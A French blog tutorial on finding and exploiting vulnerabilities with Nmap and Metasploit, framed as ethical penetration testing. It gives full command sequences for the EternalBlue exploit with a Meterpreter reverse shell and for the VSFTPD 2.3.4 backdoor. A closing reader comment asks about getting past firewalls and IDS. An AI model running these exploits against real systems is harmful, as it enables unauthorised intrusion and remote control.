Vulnérabilité exploitable par Métasploit

Par bbassole, 22 mars, 2025

Avec un outil comme Metasploit, il est possible d'identifier et d'exploiter les vulnérabilités d'un système ou d'un produit dans le but de renforcer la protection des systèmes. Ceci est une étape clé dans les tests d'intrusion. Voici un guide pour maîtriser ce processus.

1. L'identification d'une vulnérabilité

  • Utilisation des bons outils : Avant toute chose, il faut utiliser les bons outils pour détecter les failles. Des outils comme Nmap sont parfaits pour cela. Vous pourrez scanner les ports et les services vulnérables. Par exemple, pour lancer Nmap, il vous suffit de taper dans le terminal : 
    nmap -sV 192.168.1.10
  • Recherche approfondie : Si vous voulez être plus précis dans votre recherche, utilisez le script VULNERS : 
    nmap --script vulners -sV 192.168.1.10

2. La recherche d'un exploit

  • Trouver un exploit : Après avoir trouvé une faille, on peut chercher un module d'exploitation relié à celle-ci. Par exemple, si on a une vulnérabilité SMB (Server Message Block), un protocole de partage de fichiers et d'imprimantes en réseau utilisé par Windows : 
    msf6 > search type:exploit platform:windows smb
  • Exemple d'exploit : Cela affichera des options comme exploit/windows/smb/ms17_010_eternalblue. C'est un exploit assez célèbre pour la faille EternalBlue, notamment utilisée en 2017 lors des attaques WannaCry et NotPetya.

3. Configuration et lancement de l'exploit

  • Sélection du module : Pour commencer, on va sélectionner le module : 
    msf6 > use exploit/windows/smb/ms17_010_eternalblue
  • Configuration des options : Ensuite, on configure chacune des options que l'on souhaite utiliser : 
    msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.5
  • Lancement de l'exploit : Maintenant, on est prêt à lancer notre attaque et voir le résultat de notre travail : 
    msf6 exploit(ms17_010_eternalblue) > exploit
  • Session Meterpreter : Une session Meterpreter, un shell avancé pour interagir avec la machine ciblée, devrait s'ouvrir si tout s'est bien passé.

4. Exemple pratique : Exploitation d'un serveur FTP vulnérable

  • Serveur FTP vulnérable : Un serveur FTP vulnérable (File Transfer Protocol) présente des failles de sécurité exploitables, comme des versions obsolètes ou des backdoors. Un exemple serait le serveur VSFTPD 2.3.4, qui contient un backdoor connu. Voici comment l'exploiter : 
    msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.1.10
msf6 exploit(vsftpd_234_backdoor) > exploit

Conclusion

Pour exploiter des vulnérabilités, vous devez avoir une bonne compréhension des failles et des outils de scan à utiliser, comme Nmap. Si vous suivez les étapes clés (identification, recherche d'exploit, configuration et exploitation) apprises aujourd'hui, vous pourrez simuler des attaques réalistes pour renforcer la sécurité des systèmes. Et comme d'habitude, n'oubliez pas d'agir de manière éthique et toujours dans un cadre légal.

Références

  1. Nmap - Script VULNERS
    Lien : https://nmap.org/nsedoc/scripts/vulners.html
    (consulté le 21 mars 2025)

  2. Exploit-db - VSFTPD 2.3.4 Backdoor
    Lien : https://www.exploit-db.com/exploits/17491
    (consulté le 21 mars 2025)

  3. OWASP Top Ten
    Lien : https://owasp.org/www-project-top-ten/
    (consulté le 20 mars 2025)

Étiquettes

Commentaires1

jcherilus

il y a 2 semaines 2 jours

Super article mais Aurais tu des astuces pour tester des exploits sur des systèmes avec des protections comme les firewalls ou les IDS/IPS ?